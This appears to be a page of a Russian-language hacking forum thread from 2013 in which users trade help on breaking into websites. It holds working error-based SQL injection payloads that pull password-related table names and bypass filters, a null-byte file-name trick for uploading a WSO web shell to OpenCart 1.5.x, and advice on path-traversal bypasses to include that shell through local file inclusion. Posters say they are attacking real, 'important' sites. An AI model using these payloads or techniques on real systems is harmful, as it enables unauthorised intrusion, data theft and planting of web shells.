Старый 27.07.2013, 14:30   #2961
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Какой конфиг вы имеете ввиду?
Конфиг с настройками подключения к базе.
Untitled вне форума   Ответить с цитированием
Старый 28.07.2013, 12:07   #2962
id13
 
Регистрация: 04.12.2010
Сообщений: 22
Репутация: 1
По умолчанию

Гуглил, но не нашел. Стоит фильтр на знак подчеркивания _
Пробовал урлкодирование, двойное урлкодирование. Пробовал как в гет так и в пост параметрах.
Фильтруется. Не могу забрать данные с некоторых таблиц из-за этого. Есть идеи?
id13 вне форума   Ответить с цитированием
Старый 29.07.2013, 14:01   #2963
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от Воришко Посмотреть сообщение
увы, на запрос со знаком ; ругается, и не выполняется.
Так же ругается на такой запрос:
Код:
'and(extractvalue(1,concat(0x3b,(select(mid(table_name,1,5))from(information_schema.columns)where(column_name='password')))))and'
то есть ни group_concat() ни mid() почему то работать не хотят, думал может запятые режет, да нет.
если так делать:
Код:
'and(extractvalue(1,concat(0x3b,(select(mid(table_name,1))from(information_schema.columns)where(column_name='password')))))and'
выдаст ошибку: Subquery returns more than 1 row 0
Вот приплыл... а сайт важен, и вывода инфы никак...
you can just use substr() with group_concat(),like that-
Код:
(extractvalue(1,concat(0x27,(select(substr(group_concat(table_name),1,150))from(information_schema.statistics)where(column_name='password')))))
then substr(@,30,150) substr(@,60,150) and so on.
spari вне форума   Ответить с цитированием
Старый 29.07.2013, 21:22   #2964
Воришко
 
Регистрация: 17.03.2013
Сообщений: 17
Репутация: -7
По умолчанию

Цитата:
Сообщение от spari Посмотреть сообщение
you can just use substr() with group_concat(),like that-
Код:
(extractvalue(1,concat(0x27,(select(substr(group_concat(table_name),1,150))from(information_schema.statistics)where(column_name='password')))))
then substr(@,30,150) substr(@,60,150) and so on.
Делал делал, без функции substr в 90% случаях через blind sql ничего вытащить нельзя, поэтому я в курсе о ней.
Воришко вне форума   Ответить с цитированием
Старый 31.07.2013, 10:36   #2965
trx
 
Аватар для trx
 
Регистрация: 29.11.2011
Сообщений: 9
Репутация: 1
По умолчанию

Всем привет! Дело имею с opencart 1.5.3.1 и 1.5.2.1 . Проблема вот в чем: успешно работает заливка файла через route=product/product/upload, получаю шифрованный ответ в json, ключ я узнал и соответственно имя файла, которое получилось на сервере тоже. Попробовал залить shell на 1.5.3.1 - все ок, работает. Заливаю также на 1.5.2.1 - болт. Версия php на обоих серваках X-Powered-By PHP/5.2.17. Покажу пример имен файлов в обоих случаях:

Код:
Успешная заливка: 
wso2.php.jpg.6ffe4fcbb409d434ac81279319644c8c - он работает, тут все хорошо (именно такое имя у него получается после того как залил на сервер)
Имя файла при заливке: wso2.php&#;.jpg
Код:
Неудачная заливка: test.php&#;.jpg.8604d5110d3e81f88cee94d06acab263 (именно такое имя у него получается после того как залил на сервер)
Заливаю такой файл: test.php&#;.jpg
Как видно проблема в нуль-байте, скорее всего magic quotes. Прошу совета! Как это обойти и все-таки выполнить shell , очень нужно.

Код:
test.php%26%23;.jpg.8604d5110d3e81f88cee94d06acab263
- если так, то файл по ссылке доступен, но обрабатывается как картинка (спасибо c411k)

UPDATE:
В первом случае если даже зааплоадить файл test.php.jpg , то перейдя по ссылке мы получим выполненный php код я не понимаю как так получается. Для второго случая вопрос актуален.

Последний раз редактировалось trx; 31.07.2013 в 16:18..
trx вне форума   Ответить с цитированием
Старый 31.07.2013, 21:40   #2966
trx
 
Аватар для trx
 
Регистрация: 29.11.2011
Сообщений: 9
Репутация: 1
По умолчанию Вопрос

Подвержен ли данный код LFI ?
В папке "../../download" лежит шелл, как его проинклудить через
PHP код:
$route 
?

PHP код:
    public function __construct($route$args = array()) {
        
$path '';
        
        
$parts explode('/'str_replace('../''', (string)$route));
        
        foreach (
$parts as $part) { 
            
$path .= $part;
            
            if (
is_dir(DIR_APPLICATION 'controller/' $path)) {
                
$path .= '/';
                
                
array_shift($parts);
                
                continue;
            }
            
            if (
is_file(DIR_APPLICATION 'controller/' str_replace('../'''$path) . '.php')) {
                
$this->file DIR_APPLICATION 'controller/' str_replace('../'''$path) . '.php';
                
                
$this->class 'Controller' preg_replace('/[^a-zA-Z0-9]/'''$path);

                
array_shift($parts);
                
                break;
            }
        }
        
        if (
$args) {
            
$this->args $args;
        }
            
        
$method array_shift($parts);
                
        if (
$method) {
            
$this->method $method;
        } else {
            
$this->method 'index';
        }
    }
    
    public function 
getFile() {
        return 
$this->file;
    }
    
    public function 
getClass() {
        return 
$this->class;
    }
    
    public function 
getMethod() {
        return 
$this->method;
    }
    
    public function 
getArgs() {
        return 
$this->args;
    }


Последний раз редактировалось trx; 31.07.2013 в 21:51..
trx вне форума   Ответить с цитированием
Старый 01.08.2013, 08:43   #2967
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Попробуйте использовать Windows-слэши(У вас вообще где инклуд? Его код сбросьте...), более никак нельзя при такой контрукции, если это ваш проект - желательно изменить это на более-понятную фильтрацию...

Последний раз редактировалось NameSpace; 01.08.2013 в 08:46..
NameSpace вне форума   Ответить с цитированием
Старый 01.08.2013, 09:09   #2968
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от trx Посмотреть сообщение
Подвержен ли данный код LFI ?
В папке "../../download" лежит шелл, как его проинклудить через
PHP код:
$route 
?
.../././ примерно так
HeartLESS вне форума   Ответить с цитированием
Старый 01.08.2013, 09:14   #2969
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от HeartLESS Посмотреть сообщение
.../././ примерно так
Если думаешь что так, приведи пример, который будет работать в данном коде. Не возможно это, можно обосновать: Мы никак не протолкнем UNIX-слеши помимо условия проверки каталога, но однако если мы протолкнем его там, путь должен быть всегда валидный, но из-за второй фильтрации в условии проверки файла это невозможно.

Файзил там, способов нет вообще... Если только код самого LFI рассмотреть, которого тут в упор не видно.

Последний раз редактировалось NameSpace; 01.08.2013 в 09:19..
NameSpace вне форума   Ответить с цитированием
Старый 01.08.2013, 10:38   #2970
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Если думаешь что так, приведи пример, который будет работать в данном коде. Не возможно это, можно обосновать: Мы никак не протолкнем UNIX-слеши помимо условия проверки каталога, но однако если мы протолкнем его там, путь должен быть всегда валидный, но из-за второй фильтрации в условии проверки файла это невозможно.

Файзил там, способов нет вообще... Если только код самого LFI рассмотреть, которого тут в упор не видно.
Согласен.

Вот же статья: http://www.waraxe.us/advisory-84.html
Только под windows LFI..

Последний раз редактировалось HeartLESS; 01.08.2013 в 10:43..
HeartLESS вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot